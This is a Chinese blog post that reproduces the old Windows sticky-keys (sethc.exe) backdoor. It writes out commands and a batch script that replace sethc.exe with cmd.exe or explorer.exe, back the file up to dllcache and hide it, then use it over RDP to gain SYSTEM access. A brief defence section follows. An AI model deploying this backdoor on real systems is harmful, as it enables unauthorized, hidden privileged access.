《老漏洞复现与分析篇》 - 其一 - shift后门

首页 / 技术分享 / 正文

引言
因为本菜鸡的博客没什么文章素材,所以想开一个新文章类别,本来想整一个漏洞分析和复现的,无奈由于实力不允许,只能再前面加一个“老”字,整一点多年前的老漏洞拿来复现和分析。俗话说得好,要善于总结前人的经验和智慧,才能在自己的前进道路上走得更快。
本系列在我能理解的范围内我都会详细讲解,我不能理解的就靠收集网上的资料了,引用会注明来源和作者,如有侵权请联系我删除。那么废话不多说,开始我们的新篇章,Here we go!

0x01 shift后门

说到这个东西就先提一下它的来源——Windows粘滞键
Windows粘滞键本身是为了不方便同时按组合键的人群使用的功能,在连按5次shift键后打开粘滞键,也就是启动了system32目录下的sethc.exe

在登入状态中,连按5次shift会以当前用户权限执行sethc.exe,而在登录界面还未登录时会默认以system用户(管理员权限)执行。

0x02 原理

原理也很简单,连按5次shift,windows会在system32目录下寻找sethc.exe并启动,我们只需要把cmd或者其他的shell程序替换掉,那么我们启动sethc.exe的时候就会默认以system用户执行我们的cmd,而且因为是系统自带的应用所以不会被杀毒软件检测

0x03 复现

如果我们在渗透过程中拿到较高权限的shell就可以直接在shell里面执行命令

copy C:\WINDOWS\system32\cmd.exe C:\windows\system32\sethc.exe

或者在拿到远程桌面后直接在系统里面替换
这里再贴一个用的比较广泛的批处理,具体步骤可以自己分析

@copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
@copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
@attrib c:\windows\system32\sethc.exe +h
@attrib c:\windows\system32\dllcache\sethc.exe +h
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
attrib c:\windows\system32\sethc.exe +h
attrib c:\windows\system32\dllcache\sethc.exe +h

我这里拿虚拟机做个演示,先打开3389端口

然后复制cmd到system32目录下并且命名sethc.exe,或者可以下载更隐藏的后门软件,我这里用的是黑基2012的后门,隐蔽性更高

替换成功

接下来我们用主机连接远程桌面试试

启动成功,并且为system权限

因为远程桌面存在时间限制自动断开连接,所以需要尽快添加用户

0x04 防御

防御方法其实也很简单粗暴,就是直接设置权限让所有人都用不了,这样无论是删除还是访问都会显示拒绝访问。
注意,这里不是直接删除,删除后系统可能会自动找回。

其实随着时代的发展,系统的更新换代,在权限分级更严格的今天,这种方法对很多系统已经不管用了,不过重要的是学到一个思路,说不定今后还能遇到用得上的地方呢

打赏
评论区
头像
    头像
    SomUrim
    2022年5月12日 09:39
    回复

    哇,居然看到了这个,爷青回

      头像
      Y5neKO
      2022年5月12日 09:52
      回复

      突然想到的hhh,不得不佩服前辈们的智慧

    头像
    Terry
    2020年10月09日 11:07
    回复

    宇神nb!

      头像
      YS_Neko
      2020年10月09日 15:20
      回复

      齐大佬yyds

    头像
    强仔
    2020年10月07日 11:14
    回复

      头像
      YS_Neko
      2020年10月07日 11:18
      回复

      只能写点老技术文章了

文章目录